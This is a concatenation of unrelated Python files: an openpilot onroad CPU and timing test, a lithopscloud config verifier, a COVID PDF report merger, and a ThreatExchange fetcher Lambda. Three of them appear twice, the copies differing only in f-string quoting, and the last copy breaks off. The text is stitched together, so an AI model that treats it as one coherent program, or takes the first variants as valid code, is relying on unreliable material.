#!/usr/bin/env python3 import json import os import subprocess import time import numpy as np import unittest from collections import Counter from pathlib import Path from cereal import car import cereal.messaging as messaging from cereal.services import service_list from common.basedir import BASEDIR from common.timeout import Timeout from common.params import Params from selfdrive.controls.lib.events import EVENTS, ET from selfdrive.loggerd.config import ROOT from selfdrive.test.helpers import set_params_enabled, release_only from tools.lib.logreader import LogReader # Baseline CPU usage by process PROCS = { "selfdrive.controls.controlsd": 35.0, "./loggerd": 10.0, "./encoderd": 12.5, "./camerad": 16.5, "./locationd": 9.1, "selfdrive.controls.plannerd": 11.7, "./_ui": 26.4, "selfdrive.locationd.paramsd": 9.0, "./_sensord": 6.17, "selfdrive.controls.radard": 4.5, "./_modeld": 4.48, "./boardd": 3.63, "./_dmonitoringmodeld": 10.0, "selfdrive.thermald.thermald": 3.87, "selfdrive.locationd.calibrationd": 2.0, "./_soundd": 1.0, "selfdrive.monitoring.dmonitoringd": 1.90, "./proclogd": 1.54, "system.logmessaged": 0.2, "./clocksd": 0.02, "./ubloxd": 0.02, "selfdrive.tombstoned": 0, "./logcatd": 0, } TIMINGS = { # rtols: max/min, rsd "can": [2.5, 0.35], "pandaStates": [2.5, 0.35], "peripheralState": [2.5, 0.35], "sendcan": [2.5, 0.35], "carState": [2.5, 0.35], "carControl": [2.5, 0.35], "controlsState": [2.5, 0.35], "lateralPlan": [2.5, 0.5], "longitudinalPlan": [2.5, 0.5], "roadCameraState": [2.5, 0.35], "driverCameraState": [2.5, 0.35], "modelV2": [2.5, 0.35], "driverState": [2.5, 0.40], "liveLocationKalman": [2.5, 0.35], "wideRoadCameraState": [1.5, 0.35], } def cputime_total(ct): return ct.cpuUser + ct.cpuSystem + ct.cpuChildrenUser + ct.cpuChildrenSystem def check_cpu_usage(first_proc, last_proc): result = "\n" result += "------------------------------------------------\n" result += "------------------ CPU Usage -------------------\n" result += "------------------------------------------------\n" r = True dt = (last_proc.logMonoTime - first_proc.logMonoTime) / 1e9 for proc_name, normal_cpu_usage in PROCS.items(): err = "" first, last = None, None try: first = [p for p in first_proc.procLog.procs if proc_name in p.cmdline][0] last = [p for p in last_proc.procLog.procs if proc_name in p.cmdline][0] cpu_time = cputime_total(last) - cputime_total(first) cpu_usage = cpu_time / dt * 100. if cpu_usage > max(normal_cpu_usage * 1.15, normal_cpu_usage + 5.0): # cpu usage is high while playing sounds if not (proc_name == "./_soundd" and cpu_usage < 65.): err = "using more CPU than normal" elif cpu_usage < min(normal_cpu_usage * 0.65, max(normal_cpu_usage - 1.0, 0.0)): err = "using less CPU than normal" except IndexError: err = f"NO METRICS FOUND {first=} {last=}\n" result += f"{proc_name.ljust(35)} {cpu_usage:5.2f}% ({normal_cpu_usage:5.2f}%) {err}\n" if len(err) > 0: r = False result += "------------------------------------------------\n" print(result) return r class TestOnroad(unittest.TestCase): @classmethod def setUpClass(cls): if "DEBUG" in os.environ: segs = filter(lambda x: os.path.exists(os.path.join(x, "rlog")), Path(ROOT).iterdir()) segs = sorted(segs, key=lambda x: x.stat().st_mtime) cls.lr = list(LogReader(os.path.join(segs[-1], "rlog"))) return # setup env os.environ['REPLAY'] = "1" os.environ['SKIP_FW_QUERY'] = "1" os.environ['FINGERPRINT'] = "TOYOTA COROLLA TSS2 2019" params = Params() params.clear_all() set_params_enabled() # Make sure athena isn't running os.system("pkill -9 -f athena") # start manager and run openpilot for a minute proc = None try: manager_path = os.path.join(BASEDIR, "selfdrive/manager/manager.py") proc = subprocess.Popen(["python", manager_path]) sm = messaging.SubMaster(['carState']) with Timeout(150, "controls didn't start"): while sm.rcv_frame['carState'] < 0: sm.update(1000) # make sure we get at least two full segments route = None cls.segments = [] with Timeout(300, "timed out waiting for logs"): while route is None: route = params.get("CurrentRoute", encoding="utf-8") time.sleep(0.1) while len(cls.segments) < 3: segs = set() if Path(ROOT).exists(): segs = set(Path(ROOT).glob(f"{route}--*")) cls.segments = sorted(segs, key=lambda s: int(str(s).rsplit('--')[-1])) time.sleep(2) # chop off last, incomplete segment cls.segments = cls.segments[:-1] finally: if proc is not None: proc.terminate() if proc.wait(60) is None: proc.kill() cls.lrs = [list(LogReader(os.path.join(str(s), "rlog"))) for s in cls.segments] # use the second segment by default as it's the first full segment cls.lr = list(LogReader(os.path.join(str(cls.segments[1]), "rlog"))) def test_cloudlog_size(self): msgs = [m for m in self.lr if m.which() == 'logMessage'] total_size = sum(len(m.as_builder().to_bytes()) for m in msgs) self.assertLess(total_size, 3.5e5) cnt = Counter(json.loads(m.logMessage)['filename'] for m in msgs) big_logs = [f for f, n in cnt.most_common(3) if n / sum(cnt.values()) > 30.] self.assertEqual(len(big_logs), 0, f"Log spam: {big_logs}") def test_cpu_usage(self): proclogs = [m for m in self.lr if m.which() == 'procLog'] self.assertGreater(len(proclogs), service_list['procLog'].frequency * 45, "insufficient samples") cpu_ok = check_cpu_usage(proclogs[0], proclogs[-1]) self.assertTrue(cpu_ok) def test_camera_processing_time(self): result = "\n" result += "------------------------------------------------\n" result += "-------------- Debayer Timing ------------------\n" result += "------------------------------------------------\n" ts = [getattr(getattr(m, m.which()), "processingTime") for m in self.lr if 'CameraState' in m.which()] self.assertLess(min(ts), 0.025, f"high execution time: {min(ts)}") result += f"execution time: min {min(ts):.5f}s\n" result += f"execution time: max {max(ts):.5f}s\n" result += f"execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_mpc_execution_timings(self): result = "\n" result += "------------------------------------------------\n" result += "----------------- MPC Timing ------------------\n" result += "------------------------------------------------\n" cfgs = [("lateralPlan", 0.05, 0.05), ("longitudinalPlan", 0.05, 0.05)] for (s, instant_max, avg_max) in cfgs: ts = [getattr(getattr(m, s), "solverExecutionTime") for m in self.lr if m.which() == s] self.assertLess(max(ts), instant_max, f"high '{s}' execution time: {max(ts)}") self.assertLess(np.mean(ts), avg_max, f"high avg '{s}' execution time: {np.mean(ts)}") result += f"'{s}' execution time: min {min(ts):.5f}s\n" result += f"'{s}' execution time: max {max(ts):.5f}s\n" result += f"'{s}' execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_model_execution_timings(self): result = "\n" result += "------------------------------------------------\n" result += "----------------- Model Timing -----------------\n" result += "------------------------------------------------\n" # TODO: this went up when plannerd cpu usage increased, why? cfgs = [ ("modelV2", 0.050, 0.036), ("driverState", 0.050, 0.026), ] for (s, instant_max, avg_max) in cfgs: ts = [getattr(getattr(m, s), "modelExecutionTime") for m in self.lr if m.which() == s] self.assertLess(max(ts), instant_max, f"high '{s}' execution time: {max(ts)}") self.assertLess(np.mean(ts), avg_max, f"high avg '{s}' execution time: {np.mean(ts)}") result += f"'{s}' execution time: min {min(ts):.5f}s\n" result += f"'{s}' execution time: max {max(ts):.5f}s\n" result += f"'{s}' execution time: mean {np.mean(ts):.5f}s\n" result += "------------------------------------------------\n" print(result) def test_timings(self): passed = True result = "\n" result += "------------------------------------------------\n" result += "----------------- Service Timings --------------\n" result += "------------------------------------------------\n" for s, (maxmin, rsd) in TIMINGS.items(): msgs = [m.logMonoTime for m in self.lr if m.which() == s] if not len(msgs): raise Exception(f"missing {s}") ts = np.diff(msgs) / 1e9 dt = 1 / service_list[s].frequency try: np.testing.assert_allclose(np.mean(ts), dt, rtol=0.03, err_msg=f"{s} - failed mean timing check") np.testing.assert_allclose([np.max(ts), np.min(ts)], dt, rtol=maxmin, err_msg=f"{s} - failed max/min timing check") except Exception as e: result += str(e) + "\n" passed = False if np.std(ts) / dt > rsd: result += f"{s} - failed RSD timing check\n" passed = False result += f"{s.ljust(40)}: {np.array([np.mean(ts), np.max(ts), np.min(ts)])*1e3}\n" result += f"{''.ljust(40)} {np.max(np.absolute([np.max(ts)/dt, np.min(ts)/dt]))} {np.std(ts)/dt}\n" result += "="*67 print(result) self.assertTrue(passed) @release_only def test_startup(self): startup_alert = None for msg in self.lrs[0]: # can't use carEvents because the first msg can be dropped while loggerd is starting up if msg.which() == "controlsState": startup_alert = msg.controlsState.alertText1 break expected = EVENTS[car.CarEvent.EventName.startup][ET.PERMANENT].alert_text_1 self.assertEqual(startup_alert, expected, "wrong startup alert") if __name__ == "__main__": unittest.main()
import importlib import os import yaml from inquirer import errors from lithopscloud.modules.api_key import verify_iam_api_key from lithopscloud.modules.utils import color_msg, Color, ARG_STATUS, MSG_STATUS, free_dialog, inquire_user # TODO: change ibm_cos path to cos after cos-package name changes to cos CONFIGURABLE_STORAGE = [{'config_title': 'ibm_cos', 'path': 'cos-package'}, {'config_title': 'localhost', 'path': 'local_host'}] CONFIGURABLE_COMPUTE = [{'config_title': 'ibm_cf', 'path': 'cloud_functions'}, {'config_title': 'code_engine', 'path': 'code_engine'}, {'config_title': 'localhost', 'path': 'local_host'}] def verify_config_file(config_file, output_file): """executed via cli flag 'verify-config', this function outputs error messages based on lacking or invalid values of the provided lithops config file. """ verify_file_path(config_file) with open(config_file) as f: base_config = yaml.safe_load(f) verify_iamapikey(base_config) # verify once a commonly shared resource in various backends chosen_compute, chosen_storage = get_backends(base_config) output_config = {'lithops': base_config['lithops']} storage_path = next((x['path'] for x in CONFIGURABLE_STORAGE if x['config_title'] == chosen_storage)) compute_path = next((x['path'] for x in CONFIGURABLE_COMPUTE if x['config_title'] == chosen_compute)) for path in [storage_path, compute_path]: verify_module = importlib.import_module(f"lithopscloud.modules.{path}.verify") verify_func = verify_module.__getattribute__('verify') res = verify_func(base_config) if res: output_config.update(res) else: print(color_msg(f"{MSG_STATUS.ERROR.value} Couldn't produce a valid lithops config file from input", Color.RED)) exit(1) with open(output_file, 'w') as outfile: yaml.dump(output_config, outfile, default_flow_style=False) print("\n\n=================================================") print(color_msg(f"Extracted config file: {output_file}", color=Color.LIGHTGREEN)) print("=================================================") def get_backends(base_config): if base_config.get('lithops'): if base_config['lithops'].get('backend'): chosen_compute = base_config['lithops'].get('backend') if chosen_compute not in [compute['config_title'] for compute in CONFIGURABLE_COMPUTE]: print(color_msg(f"{MSG_STATUS.ERROR.value} chosen compute backend isn't configurable at this point in time." f"\nAvailable compute backends: {[backend["config_title"] for backend in CONFIGURABLE_COMPUTE]}",Color.RED)) exit(1) else: print(color_msg("Missing chosen compute backend under lithops->backend",Color.RED)) chosen_compute = get_missing_backend(base_config, CONFIGURABLE_COMPUTE) if base_config['lithops'].get('storage'): chosen_storage = base_config['lithops'].get('storage') if chosen_storage not in [storage['config_title'] for storage in CONFIGURABLE_STORAGE]: print(color_msg(f"{MSG_STATUS.ERROR.value} chosen storage backend isn't configurable at this point in time." f"\nAvailable storage backends: {[backend["config_title"] for backend in CONFIGURABLE_STORAGE]}",Color.RED)) exit(1) else: print(color_msg("Missing chosen storage backend under lithops->storage", Color.RED)) chosen_storage = get_missing_backend(base_config, CONFIGURABLE_STORAGE) else: base_config['lithops'] = {'backend': '', 'storage': ''} chosen_compute = get_missing_backend(base_config, CONFIGURABLE_COMPUTE) chosen_storage = get_missing_backend(base_config, CONFIGURABLE_STORAGE) return chosen_compute, chosen_storage def get_missing_backend(config_data, backend_list): """returns the missing compute/storage backend title, the user would like to verify in the verification process.""" input_file_backends = {backend['config_title'] for backend in backend_list}.intersection(config_data.keys()) backend_type = 'computation' if backend_list == CONFIGURABLE_COMPUTE else 'storage' backend_header = 'backend' if backend_list == CONFIGURABLE_COMPUTE else 'storage' if len(input_file_backends) > 1: chosen_backend = inquire_user("please choose a single computation backend", input_file_backends, handle_strings=True) config_data['lithops'].update({f'{backend_header}': chosen_backend}) elif len(input_file_backends) == 1: chosen_backend = next((x for x in input_file_backends)) # set: {} doesn't support '[]' get item operation config_data['lithops'].update({f'{backend_header}': chosen_backend}) else: print(color_msg(f"[Error] No supported {backend_type} backends were found in the config file", Color.RED)) exit(1) return chosen_backend def verify_iamapikey(base_config): if 'ibm' in base_config and base_config['ibm'] and 'iam_api_key' in base_config['ibm']: try: verify_iam_api_key('', base_config['ibm']['iam_api_key']) except errors.ValidationError: base_config['ibm']['iam_api_key'] = ARG_STATUS.INVALID print(color_msg('No IAmApiKey matching the given value was found', Color.RED)) else: base_config['ibm'] = {'iam_api_key': ''} def verify_file_path(config_file): def _is_valid_input_path(path): if not os.path.isfile(path): print(color_msg(f"\nError - Path: '{path}' doesn't point to a file. ", color=Color.RED)) return False return True while True: if _is_valid_input_path(config_file): return config_file else: config_file = free_dialog('Provide a path to an existing config file')['answer']
import importlib import os import yaml from inquirer import errors from lithopscloud.modules.api_key import verify_iam_api_key from lithopscloud.modules.utils import color_msg, Color, ARG_STATUS, MSG_STATUS, free_dialog, inquire_user # TODO: change ibm_cos path to cos after cos-package name changes to cos CONFIGURABLE_STORAGE = [{'config_title': 'ibm_cos', 'path': 'cos-package'}, {'config_title': 'localhost', 'path': 'local_host'}] CONFIGURABLE_COMPUTE = [{'config_title': 'ibm_cf', 'path': 'cloud_functions'}, {'config_title': 'code_engine', 'path': 'code_engine'}, {'config_title': 'localhost', 'path': 'local_host'}] def verify_config_file(config_file, output_file): """executed via cli flag 'verify-config', this function outputs error messages based on lacking or invalid values of the provided lithops config file. """ verify_file_path(config_file) with open(config_file) as f: base_config = yaml.safe_load(f) verify_iamapikey(base_config) # verify once a commonly shared resource in various backends chosen_compute, chosen_storage = get_backends(base_config) output_config = {'lithops': base_config['lithops']} storage_path = next((x['path'] for x in CONFIGURABLE_STORAGE if x['config_title'] == chosen_storage)) compute_path = next((x['path'] for x in CONFIGURABLE_COMPUTE if x['config_title'] == chosen_compute)) for path in [storage_path, compute_path]: verify_module = importlib.import_module(f"lithopscloud.modules.{path}.verify") verify_func = verify_module.__getattribute__('verify') res = verify_func(base_config) if res: output_config.update(res) else: print(color_msg(f"{MSG_STATUS.ERROR.value} Couldn't produce a valid lithops config file from input", Color.RED)) exit(1) with open(output_file, 'w') as outfile: yaml.dump(output_config, outfile, default_flow_style=False) print("\n\n=================================================") print(color_msg(f"Extracted config file: {output_file}", color=Color.LIGHTGREEN)) print("=================================================") def get_backends(base_config): if base_config.get('lithops'): if base_config['lithops'].get('backend'): chosen_compute = base_config['lithops'].get('backend') if chosen_compute not in [compute['config_title'] for compute in CONFIGURABLE_COMPUTE]: print(color_msg(f"{MSG_STATUS.ERROR.value} chosen compute backend isn't configurable at this point in time." f"\nAvailable compute backends: {[backend['config_title'] for backend in CONFIGURABLE_COMPUTE]}",Color.RED)) exit(1) else: print(color_msg("Missing chosen compute backend under lithops->backend",Color.RED)) chosen_compute = get_missing_backend(base_config, CONFIGURABLE_COMPUTE) if base_config['lithops'].get('storage'): chosen_storage = base_config['lithops'].get('storage') if chosen_storage not in [storage['config_title'] for storage in CONFIGURABLE_STORAGE]: print(color_msg(f"{MSG_STATUS.ERROR.value} chosen storage backend isn't configurable at this point in time." f"\nAvailable storage backends: {[backend['config_title'] for backend in CONFIGURABLE_STORAGE]}",Color.RED)) exit(1) else: print(color_msg("Missing chosen storage backend under lithops->storage", Color.RED)) chosen_storage = get_missing_backend(base_config, CONFIGURABLE_STORAGE) else: base_config['lithops'] = {'backend': '', 'storage': ''} chosen_compute = get_missing_backend(base_config, CONFIGURABLE_COMPUTE) chosen_storage = get_missing_backend(base_config, CONFIGURABLE_STORAGE) return chosen_compute, chosen_storage def get_missing_backend(config_data, backend_list): """returns the missing compute/storage backend title, the user would like to verify in the verification process.""" input_file_backends = {backend['config_title'] for backend in backend_list}.intersection(config_data.keys()) backend_type = 'computation' if backend_list == CONFIGURABLE_COMPUTE else 'storage' backend_header = 'backend' if backend_list == CONFIGURABLE_COMPUTE else 'storage' if len(input_file_backends) > 1: chosen_backend = inquire_user("please choose a single computation backend", input_file_backends, handle_strings=True) config_data['lithops'].update({f'{backend_header}': chosen_backend}) elif len(input_file_backends) == 1: chosen_backend = next((x for x in input_file_backends)) # set: {} doesn't support '[]' get item operation config_data['lithops'].update({f'{backend_header}': chosen_backend}) else: print(color_msg(f"[Error] No supported {backend_type} backends were found in the config file", Color.RED)) exit(1) return chosen_backend def verify_iamapikey(base_config): if 'ibm' in base_config and base_config['ibm'] and 'iam_api_key' in base_config['ibm']: try: verify_iam_api_key('', base_config['ibm']['iam_api_key']) except errors.ValidationError: base_config['ibm']['iam_api_key'] = ARG_STATUS.INVALID print(color_msg('No IAmApiKey matching the given value was found', Color.RED)) else: base_config['ibm'] = {'iam_api_key': ''} def verify_file_path(config_file): def _is_valid_input_path(path): if not os.path.isfile(path): print(color_msg(f"\nError - Path: '{path}' doesn't point to a file. ", color=Color.RED)) return False return True while True: if _is_valid_input_path(config_file): return config_file else: config_file = free_dialog('Provide a path to an existing config file')['answer']
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Mar 17 12:33:39 2021 @author: Clement """ import pandas import PyPDF2 import os import sys import docx from docxtpl import DocxTemplate from docx2pdf import convert sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) from gen_fct import df_fct from gen_fct import file_fct class merging_pdf: def __init__ (self, list_files): self.db_files, self.db_file_date = df_fct.read_db_files() self.root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) self.date = pandas.to_datetime('today') self.list_files = list_files def full_path (self, a_file): if self.db_files.loc[a_file, 'add_date']: year = self.db_file_date.loc[a_file, 'date'].strftime("%Y") month = self.db_file_date.loc[a_file, 'date'].strftime("%m - %B") day = self.db_file_date.loc[a_file, 'date'].strftime("%Y-%m-%d") source_path = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, "local_path"]}/{year}/{month}") source_path_prev = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, "local_path_prev"]}/{year}/{month}") name_file = self.db_files.loc[a_file, 'pref'] + day + self.db_files.loc[a_file, 'suf'] else: source_path = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, "local_path"]}") source_path_prev = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, "local_path_prev"]}") name_file = self.db_files.loc[a_file, 'pref'] + self.db_files.loc[a_file, 'suf'] full_name = os.path.normpath(f'{source_path}/{name_file}.pdf') return full_name def merging_pdf (self, full_path): pdf_writer = PyPDF2.PdfFileWriter() file = open(full_path, 'rb') file_reader = PyPDF2.PdfFileReader(file) for page_num in range(file_reader.numPages): page_object = file_reader.getPage(page_num) pdf_writer.addPage(page_object) #os.remove(full_path) for a_file in self.list_files: if self.db_files.loc[a_file, 'type_file'] == 'Graph': full_name = self.full_path (a_file) file = open(full_name, 'rb') file_reader = PyPDF2.PdfFileReader(file) for page_num in range(file_reader.numPages): page_object = file_reader.getPage(page_num) pdf_writer.addPage(page_object) file_fct.save_pdf (pdf_writer, self.date) file.close() os.remove(full_path) def var_template (self): final_dic = {} final_dic['date'] = self.date.strftime("%Y-%m-%d") full_list = [] page = 2 for a_file in self.list_files: if self.db_files.loc[a_file, 'type_file'] == 'Graph': full_list.append({'name': a_file, 'page': page}) full_name = self.full_path (a_file) file = open(full_name, 'rb') file_reader = PyPDF2.PdfFileReader(file) page += file_reader.numPages final_dic['list_file'] = full_list return final_dic def fill_template (self): context = self.var_template() path_to_template = os.path.normpath(f'{self.root}/src/pdf_creation/template.docx') template = DocxTemplate(path_to_template) template.render (context) date_str = self.date.strftime("%Y-%m-%d") year = self.date.strftime("%Y") month = self.date.strftime("%m - %B") #file_dir = f"{self.root}/reports/Daily_PDF/{year}/{month}" #file_name = f"First_page_{date_str}" file_dir = f"{self.root}/reports/Daily_PDF" file_name = "First_page" file_fct.creation_folder ('', [file_dir]) full_path = os.path.normcase(f'{file_dir}/{file_name}.docx') template.save(full_path) convert(full_path) os.remove(full_path) return os.path.normcase(f'{file_dir}/{file_name}.pdf') def main (self): print('*** Generating daily brief ***\n\n') full_path = self.fill_template() self.merging_pdf(full_path) if __name__ == '__main__': list_files = ["4_countries_delta", "4_countries_growth", "world_delta", "world_growth", "stack_plot", "France_delta", "France_growth", "France_Gen_Situation", "France_Indic_Nat", "Map_France_Indic", "Map_France_Prev_tx_incid", "Map_France_Prev_R", "Map_France_Prev_taux_occupation_sae", "Map_France_Prev_tx_pos", "French_Vax", "US_Testing", "France_Testing", "All countries"] list_files = ["4_countries_delta", "4_countries_growth", "world_delta", "world_growth", "stack_plot", "France_delta", "France_growth", "Portugal_delta", "Portugal_growth", "France_Gen_Situation", "France_Indic_Nat", "Map_France_Indic", "Map_France_Prev_tx_incid", "Map_France_Prev_R", "Map_France_Prev_taux_occupation_sae", "Map_France_Prev_tx_pos", "French_Vax", "France_Testing", "All countries"] merging_pdf(list_files).main()
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Mar 17 12:33:39 2021 @author: Clement """ import pandas import PyPDF2 import os import sys import docx from docxtpl import DocxTemplate from docx2pdf import convert sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) from gen_fct import df_fct from gen_fct import file_fct class merging_pdf: def __init__ (self, list_files): self.db_files, self.db_file_date = df_fct.read_db_files() self.root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) self.date = pandas.to_datetime('today') self.list_files = list_files def full_path (self, a_file): if self.db_files.loc[a_file, 'add_date']: year = self.db_file_date.loc[a_file, 'date'].strftime("%Y") month = self.db_file_date.loc[a_file, 'date'].strftime("%m - %B") day = self.db_file_date.loc[a_file, 'date'].strftime("%Y-%m-%d") source_path = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, 'local_path']}/{year}/{month}") source_path_prev = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, 'local_path_prev']}/{year}/{month}") name_file = self.db_files.loc[a_file, 'pref'] + day + self.db_files.loc[a_file, 'suf'] else: source_path = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, 'local_path']}") source_path_prev = os.path.normpath(f"{self.root}/{self.db_files.loc[a_file, 'local_path_prev']}") name_file = self.db_files.loc[a_file, 'pref'] + self.db_files.loc[a_file, 'suf'] full_name = os.path.normpath(f'{source_path}/{name_file}.pdf') return full_name def merging_pdf (self, full_path): pdf_writer = PyPDF2.PdfFileWriter() file = open(full_path, 'rb') file_reader = PyPDF2.PdfFileReader(file) for page_num in range(file_reader.numPages): page_object = file_reader.getPage(page_num) pdf_writer.addPage(page_object) #os.remove(full_path) for a_file in self.list_files: if self.db_files.loc[a_file, 'type_file'] == 'Graph': full_name = self.full_path (a_file) file = open(full_name, 'rb') file_reader = PyPDF2.PdfFileReader(file) for page_num in range(file_reader.numPages): page_object = file_reader.getPage(page_num) pdf_writer.addPage(page_object) file_fct.save_pdf (pdf_writer, self.date) file.close() os.remove(full_path) def var_template (self): final_dic = {} final_dic['date'] = self.date.strftime("%Y-%m-%d") full_list = [] page = 2 for a_file in self.list_files: if self.db_files.loc[a_file, 'type_file'] == 'Graph': full_list.append({'name': a_file, 'page': page}) full_name = self.full_path (a_file) file = open(full_name, 'rb') file_reader = PyPDF2.PdfFileReader(file) page += file_reader.numPages final_dic['list_file'] = full_list return final_dic def fill_template (self): context = self.var_template() path_to_template = os.path.normpath(f'{self.root}/src/pdf_creation/template.docx') template = DocxTemplate(path_to_template) template.render (context) date_str = self.date.strftime("%Y-%m-%d") year = self.date.strftime("%Y") month = self.date.strftime("%m - %B") #file_dir = f"{self.root}/reports/Daily_PDF/{year}/{month}" #file_name = f"First_page_{date_str}" file_dir = f"{self.root}/reports/Daily_PDF" file_name = "First_page" file_fct.creation_folder ('', [file_dir]) full_path = os.path.normcase(f'{file_dir}/{file_name}.docx') template.save(full_path) convert(full_path) os.remove(full_path) return os.path.normcase(f'{file_dir}/{file_name}.pdf') def main (self): print('*** Generating daily brief ***\n\n') full_path = self.fill_template() self.merging_pdf(full_path) if __name__ == '__main__': list_files = ["4_countries_delta", "4_countries_growth", "world_delta", "world_growth", "stack_plot", "France_delta", "France_growth", "France_Gen_Situation", "France_Indic_Nat", "Map_France_Indic", "Map_France_Prev_tx_incid", "Map_France_Prev_R", "Map_France_Prev_taux_occupation_sae", "Map_France_Prev_tx_pos", "French_Vax", "US_Testing", "France_Testing", "All countries"] list_files = ["4_countries_delta", "4_countries_growth", "world_delta", "world_growth", "stack_plot", "France_delta", "France_growth", "Portugal_delta", "Portugal_growth", "France_Gen_Situation", "France_Indic_Nat", "Map_France_Indic", "Map_France_Prev_tx_incid", "Map_France_Prev_R", "Map_France_Prev_taux_occupation_sae", "Map_France_Prev_tx_pos", "French_Vax", "France_Testing", "All countries"] merging_pdf(list_files).main()
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved """ Implementation of the "fetcher" module of HMA. Fetching involves connecting to the ThreatExchange API and downloading signals to synchronize a local copy of the database, which will then be fed into various indices. """ import logging import os import typing as t from dataclasses import dataclass from datetime import datetime from functools import lru_cache import boto3 from threatexchange.api import ThreatExchangeAPI from threatexchange.signal_type.pdq import PdqSignal from threatexchange.signal_type.md5 import VideoMD5Signal from hmalib.aws_secrets import AWSSecrets from hmalib.common.config import HMAConfig from hmalib.common.logging import get_logger from hmalib.common.configs.fetcher import ThreatExchangeConfig from hmalib.common.s3_adapters import ThreatUpdateS3Store logger = get_logger(__name__) dynamodb = boto3.resource("dynamodb") @lru_cache(maxsize=None) def get_s3_client(): return boto3.client("s3") # Lambda init tricks @lru_cache(maxsize=1) def lambda_init_once(): """ Do some late initialization for required lambda components. Lambda initialization is weird - despite the existence of perfectly good constructions like __name__ == __main__, there don't appear to be easy ways to split your lambda-specific logic from your module logic except by splitting up the files and making your lambda entry as small as possible. TODO: Just refactor this file to separate the lambda and functional components """ cfg = FetcherConfig.get() HMAConfig.initialize(cfg.config_table_name) @dataclass class FetcherConfig: """ Simple holder for getting typed environment variables """ s3_bucket: str s3_te_data_folder: str config_table_name: str data_store_table: str @classmethod @lru_cache(maxsize=None) # probably overkill, but at least it's consistent def get(cls): # These defaults are naive but can be updated for testing purposes. return cls( s3_bucket=os.environ["THREAT_EXCHANGE_DATA_BUCKET_NAME"], s3_te_data_folder=os.environ["THREAT_EXCHANGE_DATA_FOLDER"], config_table_name=os.environ["CONFIG_TABLE_NAME"], data_store_table=os.environ["DYNAMODB_DATASTORE_TABLE"], ) def is_int(int_string: str): """ Checks if string is convertible to int. """ try: int(int_string) return True except ValueError: return False def lambda_handler(event, context): lambda_init_once() config = FetcherConfig.get() collabs = ThreatExchangeConfig.get_all() now = datetime.now() current_time = now.strftime("%H:%M:%S") names = [collab.privacy_group_name for collab in collabs[:5]] if len(names) < len(collabs): names[-1] = "..." data = f"Triggered at time {current_time}, found {len(collabs)} collabs: {", ".join(names)}" logger.info(data) api_key = AWSSecrets().te_api_key() api = ThreatExchangeAPI(api_key) for collab in collabs: logger.info( "Processing updates for collaboration %s", collab.privacy_group_name ) if not is_int(collab.privacy_group_id): logger.info( f"Fetch skipped because privacy_group_id({collab.privacy_group_id}) is not an int" ) continue indicator_store = ThreatUpdateS3Store( int(collab.privacy_group_id), api.app_id, s3_client=get_s3_client(), s3_bucket_name=config.s3_bucket, s3_te_data_folder=config.s3_te_data_folder, data_store_table=config.data_store_table, supported_signal_types=[VideoMD5Signal, PdqSignal], ) indicator_store.load_checkpoint() if indicator_store.stale: logger.warning( "Store for %s - %d stale! Resetting.", collab.privacy_group_name, int(collab.privacy_group_id), ) indicator_store.reset() if indicator_store.fetch_checkpoint >= now.timestamp(): continue delta = indicator_store.next_delta try: delta.incremental_sync_from_threatexchange( api, ) except: # Don't need to call .exception() here because we're just re-raising logger.error("Exception occurred! Attempting to save...") # Force delta to show finished delta.end = delta.current raise finally: if delta: logging.info("Fetch complete, applying %d updates", len(delta.updates)) indicator_store.apply_updates( delta, post_apply_fn=indicator_store.post_apply ) else: logging.error("Failed before fetching any records")
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved """ Implementation of the "fetcher" module of HMA. Fetching involves connecting to the ThreatExchange API and downloading signals to synchronize a local copy of the database, which will then be fed into various indices. """ import logging import os import typing as t from dataclasses import dataclass from datetime import datetime from functools import lru_cache import boto3 from threatexchange.api import ThreatExchangeAPI from threatexchange.signal_type.pdq import PdqSignal from threatexchange.signal_type.md5 import VideoMD5Signal from hmalib.aws_secrets import AWSSecrets from hmalib.common.config import HMAConfig from hmalib.common.logging import get_logger from hmalib.common.configs.fetcher import ThreatExchangeConfig from hmalib.common.s3_adapters import ThreatUpdateS3Store logger = get_logger(__name__) dynamodb = boto3.resource("dynamodb") @lru_cache(maxsize=None) def get_s3_client(): return boto3.client("s3") # Lambda init tricks @lru_cache(maxsize=1) def lambda_init_once(): """ Do some late initialization for required lambda components. Lambda initialization is weird - despite the existence of perfectly good constructions like __name__ == __main__, there don't appear to be easy ways to split your lambda-specific logic from your module logic except by splitting up the files and making your lambda entry as small as possible. TODO: Just refactor this file to separate the lambda and functional components """ cfg = FetcherConfig.get() HMAConfig.initialize(cfg.config_table_name) @dataclass class FetcherConfig: """ Simple holder for getting typed environment variables """ s3_bucket: str s3_te_data_folder: str config_table_name: str data_store_table: str @classmethod @lru_cache(maxsize=None) # probably overkill, but at least it's consistent def get(cls): # These defaults are naive but can be updated for testing purposes. return cls( s3_bucket=os.environ["THREAT_EXCHANGE_DATA_BUCKET_NAME"], s3_te_data_folder=os.environ["THREAT_EXCHANGE_DATA_FOLDER"], config_table_name=os.environ["CONFIG_TABLE_NAME"], data_store_table=os.environ["DYNAMODB_DATASTORE_TABLE"], ) def is_int(int_string: str): """ Checks if string is convertible to int. """ try: int(int_string) return True except ValueError: return False def lambda_handler(event, context): lambda_init_once() config = FetcherConfig.get() collabs = ThreatExchangeConfig.get_all() now = datetime.now() current_time = now.strftime("%H:%M:%S") names = [collab.privacy_group_name for collab in collabs[:5]] if len(names) < len(collabs): names[-1] = "..." data = f"Triggered at time {current_time}, found {len(collabs)} collabs: {', '.join(names)}" logger.info(data) api_key = AWSSecrets().te_api_key() api = ThreatExchangeAPI(api_key) for collab in 